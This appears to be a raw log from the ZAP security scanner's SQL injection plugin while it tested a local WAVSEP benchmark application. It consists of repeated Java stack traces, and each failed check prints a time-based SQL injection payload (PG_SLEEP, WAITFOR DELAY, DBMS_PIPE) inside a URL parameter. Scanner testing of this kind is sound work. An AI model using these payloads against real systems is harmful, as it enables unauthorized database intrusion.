http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679656 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679657 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679658 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679658 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679659 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679660 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679661 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679662 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679667 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679668 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679669 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(118)||CHR(112),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(118)||CHR(112),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679670 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(77)||CHR(108)||CHR(78),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(116)||CHR(77)||CHR(108)||CHR(78),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679671 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(112)||CHR(100)||CHR(122),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(112)||CHR(100)||CHR(122),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at 